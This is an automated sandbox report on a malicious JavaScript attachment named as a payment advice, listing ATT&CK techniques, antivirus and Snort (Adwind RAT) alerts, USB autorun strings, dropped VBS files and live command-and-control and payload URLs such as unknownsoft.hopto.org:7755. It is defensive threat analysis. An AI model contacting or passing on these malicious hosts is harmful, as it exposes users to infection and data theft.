
Analysis Report: 35Payment Advise - 201903140987758292 copy_2.js

Overview

General Information

Joe Sandbox Version: 25.0.0 Tiger's Eye
Analysis ID: 116875
Start date: 15.03.2019
Start time: 04:06:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 56s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 35Payment Advise - 201903140987758292 copy_2.js
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (Javascript)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winJS@62/29@28/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, wermgr.exe, conhost.exe, CompatTelRunner.exe, svchost.exe
  • Execution Graph export aborted for target wscript.exe, PID 2440 because there are no executed functions
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, java.exe

Detection

Strategy   Score  Range    Reporting       Whitelisted  Detection
Threshold  100    0 - 100  Report FP / FN  false        malicious

Confidence

Strategy   Score  Range  Further Analysis Required?  Confidence
Threshold  5      0 - 5  false


Classification

Analysis Advice

Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial Access: Replication Through Removable Media 1; Replication Through Removable Media; Drive-by Compromise; Exploit Public-Facing Application
Execution: Scheduled Task 1; Scripting 11; Exploitation for Client Execution 1; Scheduled Task
Persistence: Startup Items 2; Scheduled Task 1; Registry Run Keys / Startup Folder 31; System Firmware
Privilege Escalation: Startup Items 2; Process Injection 111; Scheduled Task 1; DLL Search Order Hijacking
Defense Evasion: Disabling Security Tools 1; Process Injection 111; Scripting 11; Obfuscated Files or Information 2
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files
Discovery: Peripheral Device Discovery 1; Security Software Discovery 41; Remote System Discovery 1; File and Directory Discovery 1
Lateral Movement: Replication Through Removable Media 1; Remote Services; Windows Remote Management; Logon Scripts
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted
Command and Control: Uncommonly Used Port 1; Remote Access Tools 2; Standard Non-Application Layer Protocol 1; Standard Application Layer Protocol 1

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: http://unknownsoft.hopto.org:7755/Vre9 | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vre; | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/S-1-5-21-58933367-3072710494-194312298-1002_Classes | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vre:775 | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/VreH(4 | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vrem(); | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vrep | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/ramework | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vree( | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:77 | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/VreMicrosoftWindowss | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/ | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/VrePlx | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/calhost | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vre(dp | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/VreDld | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/D8 | Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/ces | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs | Avira: Label: VBS/Agent.276
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs | Avira: Label: VBS/Agent.276
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6958446061258612657.vbs | Avira: Label: VBS/Agent.281
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive7989435855425943881.vbs | Avira: Label: VBS/Agent.281
Multi AV Scanner detection for domain / URL
Source: http://unknownsoft.hopto.org:7755/Vre; | virustotal: Detection: 8%
Source: http://unknownsoft.hopto.org/ | virustotal: Detection: 13%

Spreading:

May infect USB drives
Source: javaw.exe, 0000000B.00000002.8764034738.000000000AB63000.00000004.sdmp | Binary or memory string: [autorun]
Source: javaw.exe, 0000000B.00000002.8764034738.000000000AB63000.00000004.sdmp | Binary or memory string: autorun.inf
Enumerates the file system
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2020728 ET TROJAN Possible Adwind SSL Cert (assylias.Inc) 31.171.152.102:5011 -> 192.168.2.6:49854
Source: Traffic | Snort IDS: 2020728 ET TROJAN Possible Adwind SSL Cert (assylias.Inc) 31.171.152.102:5011 -> 192.168.2.6:49863
Source: Traffic | Snort IDS: 2020728 ET TROJAN Possible Adwind SSL Cert (assylias.Inc) 31.171.152.102:5011 -> 192.168.2.6:49869
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.6:49831 -> 41.217.32.205:7755
Uses dynamic DNS services
Source: unknown | DNS query: name: sweetboy.duckdns.org
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: unknownsoft.hopto.org
Urls found in memory or binary data
Source: javaw.exe, 00000006.00000002.7686161944.000000000A79B000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764220942.000000000AB84000.00000004.sdmp | String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.htmlp
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.htmlx&
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp, javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl#
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crlC
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 0000000B.00000002.8765357544.000000000ADBF000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8765357544.000000000ADBF000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: javaw.exe, 0000000B.00000002.8765357544.000000000ADBF000.00000004.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crlKQ
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crlC
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crls
Source: javaw.exe, 00000006.00000002.7686230337.000000000A7A6000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7809678773.0000000009DA6000.00000004.sdmp | String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000006.00000002.7697063329.00000000157B4000.00000004.sdmp, javaw.exe, 00000006.00000002.7686913955.000000000A84B000.00000004.sdmp, javaw.exe, 0000000B.00000002.8769371398.00000000158F4000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7810350378.0000000009E4B000.00000004.sdmp, javaw.exe, 0000000F.00000002.7812015415.00000000148C1000.00000004.sdmp | String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmp | String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000006.00000002.7698359320.0000000015D50000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://policy.camerfirma.comC
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://policy.camerfirma.comK%
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp | String found in binary or memory: http://policy.camerfirma.comKe
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp | String found in binary or memory: http://policy.camerfirma.comS
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://policy.camerfirma.comXw%
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://policy.camerfirma.comh
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/#
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/0
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/3
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/3d
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/;
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/;b
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/K6
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/P
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/S
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/c
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/s
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://repository.swisssign.com/x
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl3
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl8
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crlC
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crlku
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp, wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org/
Source: wscript.exe, 00000005.00000003.8720641158.0000000006390000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org/D8
Source: wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org/S-1-5-21-58933367-3072710494-194312298-1002_Classes
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org/calhost
Source: wscript.exe, 00000005.00000002.8740935538.0000000003380000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org/ces
Source: wscript.exe, 00000005.00000003.8720893365.000000000338B000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org/ramework
Source: wscript.exe, 00000005.00000002.8745764401.0000000005400000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:77
Source: wscript.exe, 00000005.00000002.8745827512.0000000005412000.00000004.sdmp, wscript.exe, 00000005.00000003.7649806715.0000000005406000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp, wscript.exe, 00000005.00000002.8741554494.0000000003590000.00000004.sdmp, wscript.exe, 00000005.00000002.8740429180.0000000003319000.00000004.sdmp, wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmp, wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/Vre
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/Vre(dp
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/Vre2
Source: wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/Vre9
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/Vre:775
Source: wscript.exe, 00000005.00000003.8720893365.000000000338B000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/Vre;
Source: wscript.exe, 00000005.00000002.8740809676.000000000335B000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/VreDld
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/VreH(4
Source: wscript.exe, 00000005.00000002.8740429180.0000000003319000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/VreMicrosoftWindowss
Source: wscript.exe, 00000005.00000002.8740809676.000000000335B000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/VrePlx
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/Vree(
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/Vrem();
Source: wscript.exe, 00000005.00000002.8740429180.0000000003319000.00000004.sdmp, wscript.exe, 00000005.00000002.8740935538.0000000003380000.00000004.sdmp | String found in binary or memory: http://unknownsoft.hopto.org:7755/Vrep
Source: javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crl;
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crlk
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crlx
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3P.crl;
Source: javaw.exe, 0000000F.00000002.7812015415.00000000148C1000.00000004.sdmp | String found in binary or memory: http://www.chambersign.or
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp | String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp | String found in binary or memory: http://www.chambersign.orgx6
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp | String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmp | String found in binary or memory: http://www.quovadis.bm3D
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp | String found in binary or memory: http://www.quovadis.bm3N
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://www.quovadis.bmKL
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://www.quovadis.bmsL
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://www.quovadis.bmsy
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps3
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps;Z
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps;f
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cpscW
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cpsh
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cpskn
Source: wscript.exe, 00000000.00000003.7596988648.0000000006552000.00000004.sdmp, wscript.exe, 00000000.00000002.8239276434.00000000026F1000.00000004.sdmp, wscript.exe, 00000004.00000003.7650147545.00000000063DD000.00000004.sdmp | String found in binary or memory: http://www.thegoldfingerinc.com/images/jre.zip
Source: wscript.exe, 00000004.00000003.7632013252.0000000004F41000.00000004.sdmp | String found in binary or memory: http://www.thegoldfingerinc.com/images/jre.zipW
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp | String found in binary or memory: https://login.live.com
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com3?
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com3G
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.comC
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.comk

System Summary:

barindex
Creates files inside the system directory
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File created: C:\Windows\SysWOW64\test.txt
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_01
